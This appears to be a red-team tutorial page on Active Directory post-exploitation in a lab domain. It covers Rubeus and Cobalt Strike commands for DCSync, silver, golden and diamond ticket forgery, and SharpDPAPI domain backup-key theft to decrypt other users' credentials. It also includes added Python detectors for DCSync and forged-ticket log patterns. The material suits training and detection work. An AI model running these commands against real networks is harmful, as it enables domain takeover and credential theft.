
# DCSync and Ticket Forgery

Post-exploitation techniques that assume Domain Admin (or equivalent replication-level) access has already been obtained: DCSync, Kerberos ticket forgery (silver, golden, diamond) and abuse of the domain DPAPI backup key.

***

## DCSync

DCSync uses the Directory Replication Service (DRSUAPI) to ask a DC for account secrets the way another DC would. It requires the replication extended rights on the domain object (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which Domain Admins, Enterprise Admins and DC computer accounts hold by default; any other principal granted those ACEs works just as well.

```
# Impersonate DA. make_token creates a netonly logon: the password is not
# verified locally, it is only used for network authentication
make_token INLANEFREIGHT\bjohnson Passw0rd!

# Syntax: dcsync <domain FQDN> <DOMAIN\account>
# DCSync krbtgt (returns the NT hash and AES keys; the AES256 key feeds golden/diamond tickets)
dcsync inlanefreight.local INLANEFREIGHT\krbtgt

# DCSync a computer account (include the trailing $); its key feeds silver tickets
dcsync inlanefreight.local INLANEFREIGHT\ilf-db-1$
```
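
From the defender's side a DCSync run like the one above shows up on the DC as Security event 4662 on the domain object, with the replication control-access GUIDs in the Properties field (this needs "Audit Directory Service Access" enabled and a SACL on the domain object). The following is an added example, not from the page or from Cobalt Strike: it runs that detection over a few constructed 4662 records. The DC account name and all field values are assumptions made for the example.

```python
"""Detect DCSync in Windows Security event 4662.

Added example, not part of the page or of Cobalt Strike. A DRSUAPI replication
request is audited by the DC as 4662 on the domain object with AccessMask 0x100
(Control Access) and the replication rights listed by GUID in Properties.
DCs replicate with each other legitimately, so their computer accounts are
allow-listed; any other subject exercising these rights is a finding.
"""
from __future__ import annotations

import re

# Control-access right GUIDs that appear in 4662 Properties for replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumption: the lab's domain controller accounts (hypothetical name from the page).
DOMAIN_CONTROLLERS = {"ILF-DC-1$"}

GUID_RE = re.compile(
    r"\{([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})\}"
)

# Constructed records carrying only the 4662 fields that matter here.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "ILF-DC-1$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "bjohnson", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "tmorgan", "AccessMask": "0x10",
     "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "SubjectUserName": "bjohnson", "Properties": ""},
]


def replication_rights(properties: str) -> set[str]:
    """Replication right names referenced by GUID in a Properties field."""
    return {REPLICATION_RIGHTS[g.lower()]
            for g in GUID_RE.findall(properties) if g.lower() in REPLICATION_RIGHTS}


def find_dcsync(events: list[dict],
                domain_controllers: set[str] = DOMAIN_CONTROLLERS) -> list[tuple[str, list[str]]]:
    """(subject, rights) for every 4662 Control Access event that exercised a
    replication right from an account that is not a domain controller."""
    hits = []
    for e in events:
        if e.get("EventID") != 4662 or e.get("AccessMask") != "0x100":
            continue
        rights = replication_rights(e.get("Properties", ""))
        if not rights:
            continue
        subject = e.get("SubjectUserName", "")
        if subject.upper() in domain_controllers:
            continue  # DC-to-DC replication is expected
        hits.append((subject, sorted(rights)))
    return hits


if __name__ == "__main__":
    for subject, rights in find_dcsync(SAMPLE_EVENTS):
        print(f"possible DCSync by {subject}: {', '.join(rights)}")
```

In a real pipeline the allow-list also has to cover non-DC accounts that replicate legitimately, such as the Azure AD Connect synchronisation account, and the filtered-set right on its own is normal traffic from read-only DCs.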

***

## Ticket Forgery

### Silver Tickets

A silver ticket is a forged service ticket (TGS) encrypted and signed with the key of the account that runs the target service: the computer account for CIFS, HOST, HTTP/WinRM and similar, or a dedicated service account such as the MSSQL example below. It is valid only for that SPN on that host, is never sent to the KDC, and carries whatever PAC (user, RID, groups) the forger chose.

**Use case:** Keep local admin on a host after its computer account key has been obtained, e.g. by forging a CIFS ticket. Computer account passwords rotate every 30 days by default, so the key has to be collected again after a rotation.

```
# 1. DCSync the computer account first (dcsync inlanefreight.local INLANEFREIGHT\ilf-db-1$)
#    and take its aes256 key
# 2. /sid is the domain SID: take any domain user's SID (e.g. from `whoami /user`)
#    and drop the trailing RID

C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:cifs/ilf-db-1 /aes256:<computer-aes256-hash> /user:Administrator /domain:INLANEFREIGHT.LOCAL /sid:S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX /nowrap
```

**Parameters:**

* `/service` - Target SPN (e.g., cifs/hostname, MSSQLSvc/hostname:1433). The name must match what the client will request: `\\ilf-db-1\c$` asks for cifs/ilf-db-1, `\\ilf-db-1.inlanefreight.local\c$` for the FQDN form
* `/aes256` - AES256 Kerberos key of the target computer/service account (Rubeus calls it a hash); `/rc4` takes the NT hash instead
* `/user` - Username to impersonate
* `/domain` - FQDN of the domain
* `/sid` - Domain SID (without the trailing RID)
* `/id` - RID of the impersonated user (default: 500)
* `/groups` - Group RIDs placed in the PAC (default: 520,512,513,519,518)

**Inject and use:**

```
# Fresh netonly logon session (password is arbitrary) so the injected ticket
# does not overwrite the current user's ticket cache
make_token INLANEFREIGHT\Administrator FakePass
# Import the forged ticket into that session
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /ticket:<base64-ticket>
# Confirm it is cached, then use it (the hostname must match the /service SPN)
run klist
ls \\ilf-db-1\c$
# Drop the token, and with it the injected ticket, when done
rev2self
```

**Silver ticket for MSSQL (after Kerberoasting and cracking the service account password):**

```
# Derive the Kerberos keys (rc4_hmac, aes128, aes256) from the cracked password.
# The AES salt is DOMAIN + username, so /user and /domain must match the account exactly
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe hash /user:mssql_svc /domain:INLANEFREIGHT.LOCAL /password:Passw0rd!

# Forge a ticket impersonating a SQL sysadmin. SQL Server maps logins by SID, so
# /id and /groups must be the real user's RID and group RIDs, not arbitrary values
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:MSSQLSvc/ilf-db-1.inlanefreight.local:1433 /rc4:<rc4-hash> /user:tmorgan /id:1108 /groups:513,1106,1107,4602 /domain:INLANEFREIGHT.LOCAL /sid:S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX /nowrap
```

> **Note:** The PAC inside a ticket carries two signatures: a server checksum keyed with the service's key and a KDC checksum keyed with the krbtgt key. A silver-ticket forger only has the service key, so the KDC checksum is invalid; a service that performs PAC validation (asking a DC to verify it over NetLogon) rejects the ticket. By default Windows skips PAC validation for services running as SYSTEM or holding SeTcbPrivilege, which covers CIFS, HOST and most service-hosted endpoints, so silver tickets usually work in practice. Because the ticket never touches the KDC, no 4768/4769 is logged for it.

***

### Golden Tickets

A golden ticket is a forged TGT encrypted and signed with the krbtgt key. The KDC trusts any TGT it can decrypt with that key, so it issues service tickets for any SPN to whichever identity the PAC claims. Two caveats: the KDC checks that the named account exists for TGTs older than 20 minutes, and the ticket survives until the krbtgt password has been rotated twice.

```
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:<krbtgt-aes256-hash> /user:Administrator /domain:INLANEFREIGHT.LOCAL /sid:S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX /nowrap
```

**Parameters:**

* `/aes256` - krbtgt AES256 key (from the dcsync above); `/rc4` with the NT hash also works but yields an RC4 TGT, which stands out in an AES-only domain
* `/user` - Username to impersonate (should exist, see the 20-minute check above)
* `/id` - RID of the impersonated user (default: 500)
* `/groups` - Group RIDs placed in the PAC (default: 520,512,513,519,518)
* `/domain` - Target domain FQDN
* `/sid` - Target domain SID (without RID)

**Use golden ticket:**

```
# Fresh netonly session so the forged TGT does not replace the beacon's own
make_token INLANEFREIGHT\Administrator FakePass
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /ticket:<base64-ticket>
run klist
# Any SPN works now: the KDC issues service tickets against the forged TGT
ls \\ilf-dc-1\c$
```

***

### Diamond Tickets

More OPSEC-safe than a golden ticket. Rubeus obtains a legitimate TGT for the current user, decrypts it with the krbtgt key, rewrites the client name and the PAC (user, RID, groups), recomputes the PAC signatures and re-encrypts it. Because the TGT really was issued by the KDC, its timestamps, flags and session key are genuine and a 4768 exists for it, which defeats the "service ticket without a preceding TGT request" heuristic that catches golden tickets.

```
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /krbkey:<krbtgt-aes256-hash> /ticketuser:Administrator /ticketuserid:500 /domain:INLANEFREIGHT.LOCAL /nowrap
```

**Parameters:**

* `/tgtdeleg` - Obtains a usable TGT for the current user through the GSS-API delegation trick (a service ticket requested with the delegation flag for an unconstrained-delegation SPN, the DC's by default, carries a forwarded TGT that Rubeus extracts from its own AP-REQ); no password and no elevation needed
* `/krbkey` - krbtgt AES256 key
* `/ticketuser` - User to impersonate
* `/ticketuserid` - RID of the impersonated user
* `/domain` - Target domain FQDN
* `/groups` - Group RIDs placed in the PAC (default: 520,512,513,519,518)

**Use diamond ticket:**

```
# Same injection pattern as the golden ticket: separate netonly session, then ptt
make_token INLANEFREIGHT\Administrator FakePass
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /ticket:<base64-ticket>
run klist
ls \\ilf-dc-1\c$
```
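
The OPSEC difference between golden and diamond tickets is what the DC logs. The following is an added example, not part of the page: it correlates 4768 (TGT requested) with 4769 (service ticket requested) over constructed Security-log records, once per client IP and once per account. A golden ticket is minted offline, so no 4768 precedes its 4769s; a diamond ticket built with `/tgtdeleg` starts from the TGT the beacon user already holds, so a 4768 for that host exists. Event values, hosts and the 10-hour window are assumptions made for the example.

```python
"""Golden vs diamond tickets in the DC's Kerberos audit log.

Added example, not part of the page. A golden ticket is forged offline, so the
DC never logs a 4768 for it, yet each service ticket obtained with it still
produces a 4769. A diamond ticket is built from a TGT the KDC really issued,
so a successful 4768 exists for the requesting host. Events are constructed;
field names follow the Security log (TargetUserName, IpAddress, Status).
"""
from __future__ import annotations

from datetime import datetime, timedelta

T0 = datetime(2024, 1, 1, 9, 0)

EVENTS = [
    # bjohnson logs on from the beacon host: a real TGT. With /tgtdeleg the
    # diamond ticket is derived from this session's TGT, no new 4768 appears.
    {"EventID": 4768, "Time": T0, "TargetUserName": "bjohnson",
     "IpAddress": "10.10.14.5", "Status": "0x0"},
    {"EventID": 4769, "Time": T0 + timedelta(minutes=1),
     "TargetUserName": "bjohnson@INLANEFREIGHT.LOCAL",
     "IpAddress": "10.10.14.5", "ServiceName": "ILF-DC-1$"},
    # Diamond ticket: bjohnson's TGT rewritten as Administrator, used from the same host.
    {"EventID": 4769, "Time": T0 + timedelta(minutes=5),
     "TargetUserName": "Administrator@INLANEFREIGHT.LOCAL",
     "IpAddress": "10.10.14.5", "ServiceName": "ILF-DC-1$"},
    # Golden ticket used from a second host that never asked the KDC for a TGT.
    {"EventID": 4769, "Time": T0 + timedelta(minutes=30),
     "TargetUserName": "Administrator@INLANEFREIGHT.LOCAL",
     "IpAddress": "10.10.14.9", "ServiceName": "ILF-DC-1$"},
]


def by_ip(e: dict) -> str:
    return e["IpAddress"]


def by_user(e: dict) -> str:
    # 4768 logs the sAMAccountName, 4769 logs user@REALM; normalise both.
    return e["TargetUserName"].split("@")[0].lower()


def tgs_without_tgt(events: list[dict], key,
                    window: timedelta = timedelta(hours=10)) -> list[dict]:
    """4769 events whose key (client IP or account) has no successful 4768
    within `window` before them. 10 h is the default TGT lifetime."""
    tgts = [e for e in events if e["EventID"] == 4768 and e.get("Status") == "0x0"]
    hits = []
    for e in events:
        if e["EventID"] != 4769:
            continue
        covered = any(key(t) == key(e) and e["Time"] - window <= t["Time"] <= e["Time"]
                      for t in tgts)
        if not covered:
            hits.append(e)
    return hits


if __name__ == "__main__":
    print("per-IP  :", [e["IpAddress"] for e in tgs_without_tgt(EVENTS, by_ip)])    # ['10.10.14.9']
    print("per-user:", [e["IpAddress"] for e in tgs_without_tgt(EVENTS, by_user)])  # ['10.10.14.5', '10.10.14.9']
```

The per-IP correlation is the one the diamond ticket is designed to defeat, and it does: the host already has a logged TGT. The per-account correlation still fires, because the rewritten TGT names Administrator while the only 4768 from that host was for bjohnson; it only goes quiet when `/ticketuser` is the same account that owned the original TGT and just the groups were changed. The price of the per-account check is noise from long sessions: TGT renewals log 4770, not 4768, so either count 4770 as coverage or extend the lookback to the maximum renewal lifetime (7 days by default).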

***

## DPAPI Backup Key

Every domain user's DPAPI master keys are also encrypted to the domain's DPAPI backup key (an RSA key pair kept in the DC's LSA secrets) so that they can be recovered after a password reset. Whoever holds the backup private key can therefore decrypt **any** domain user's master keys and, through them, their DPAPI-protected secrets (Credential Manager, browser cookies, RDP passwords and so on). The key is generated once when the domain is created and is never rotated automatically.

### Extract Backup Key (Requires DA)

```
make_token INLANEFREIGHT\bjohnson Passw0rd!
execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe backupkey
```

**Output:**

```
[*] Preferred backupkey Guid         : 12c95677-bb3d-4932-aab9-1e89c1dd005d
[*] Key                              : HvG1s[...snip...]lXQns=
```

### Decrypt Other Users' Credentials

With local admin on a machine (needed to read other users' master key files under `%APPDATA%\Microsoft\Protect\<SID>` and the credential blobs under their profiles), decrypt those users' saved Credential Manager entries:

```
# Enumerate Credential Manager blobs; without the matching master keys SharpDPAPI
# lists each blob's MasterKey GUID but cannot decrypt it
execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe credentials

# Decrypt with the domain backup key (base64 from `backupkey`, or a .pvk file path):
# it unwraps every user's master keys, which in turn decrypt the blobs
execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe credentials /pvk:HvG1s[...snip...]lXQns=
```

> **Note:** `/rpc` asks a DC to unwrap master keys through the MS-BKRP backup protocol, which only serves the calling user's own master keys, so it cannot recover other users' credentials. `/pvk` with the domain backup key does the unwrapping locally and works for any domain user's master keys. Local (non-domain) accounts have no domain backup and need the user's password or NT hash instead.

***

## Quick Reference - Ticket Types

| Ticket Type | Secret Required              | Scope               | OPSEC                                                                                                            |
| ----------- | ---------------------------- | ------------------- | ---------------------------------------------------------------------------------------------------------------- |
| Silver      | Service/computer account key | One SPN on one host | Medium: never touches the KDC (no 4768/4769), but fails PAC validation and needs a fresh key after password rotation |
| Golden      | krbtgt key                   | Entire domain       | Lower: forged offline, so no 4768 precedes its 4769s; survives until krbtgt is rotated twice                       |
| Diamond     | krbtgt key                   | Entire domain       | Higher: built from a real, logged TGT with genuine timestamps, flags and session key                              |

